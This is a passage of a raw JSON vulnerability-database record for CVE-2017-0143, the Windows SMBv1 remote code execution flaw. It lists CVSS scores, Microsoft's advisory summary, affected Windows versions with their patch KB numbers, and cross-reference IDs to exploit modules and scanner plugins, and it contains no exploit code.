"HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-21T08:57:08", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-20T14:58:45", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T14:58:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012215", "KB3177186", "KBMS16-110, 3187754", "KB3205409", "KB3210720", "KB3213986", "KB3205401", "KB4013198", "KB4012598", "KB4012212", "KB3212646", "KB3210721", "KB4012217", "KB4012606", "KB4012214", "KB4012216", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-21T08:57:08", "differentElements": ["msAffectedSoftware"], "edition": 74}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-21T10:46:37", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-21T10:46:37", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-21T10:46:37", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KBMS16-110, 3187754", "KB4013198", "KB3210721", "KB4012214", "KB4012217", "KB4013429", "KB3213986", "KB4012212", "KB4012606", "KB4012216", "KB3210720", "KB3177186", "KB3205409", "KB3212646", "KB3205401", "KB4012598", "KB4012215"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-21T10:46:37", "differentElements": ["msAffectedSoftware"], "edition": 75}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-25T23:09:38", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", 